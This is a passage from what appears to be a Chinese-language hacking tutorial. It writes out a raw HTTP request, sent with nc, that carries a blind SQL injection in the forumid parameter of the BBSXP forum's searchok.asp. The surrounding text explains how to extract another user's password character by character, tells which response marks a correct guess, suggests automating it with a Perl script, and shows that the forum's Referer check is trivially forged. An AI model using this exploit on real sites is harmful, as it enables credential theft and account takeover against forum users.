D:/>nc localhost 80
POST /BBSXP/searchok.asp HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/msword, application/vnd.ms-powerpoint, */*
Referer: http://localhost/BBSXP/search.asp
Accept-Language: zh-cn
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Host: localhost
Content-Length: 178
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: eremite=0; now=2002-6-24 12:38:18; onlinetime=2002-6-24 12:38:05; username=never; userpass=FuckUSA!!; addmin=0; ASPSESSIONIDGQQGGLBU=CLGHHMJCCGPBMOHGPPDNFCOO
content=1&searchxm=username&search=key&searchxm2=topic&TimeLimit=&forumid=1 and 1=(select count(*) from user where left(userpass,1)='2' and username='never') &submit1=开始搜索
看出来了吗,fourmid的值是
1 and 1=(select count(*) from user where left(userpass,1)='2' and username='never')
呵呵,到这里就能够慢慢的来猜别人(这里是never)的密码了。手工猜在这里就很难办了,最好是用perl写个小东东。
至于猜测成功和否的条件也是很简单的,因为serachok.asp中判断Count=0(没有结果)时,会出现“对不起,没有找到您要查询的内容”的字样,只要获得的数据中不出现这个,那么几乎能够肯定猜对了。
嗯,写到这里发现这种东西写得一点创意都没有,但是那位问我判断instr(Request.ServerVariables("http_referer"),""&Request.ServerVariables("server_name")&"") = 0是否有用的朋友,我相信您肯定明白答案了吧。
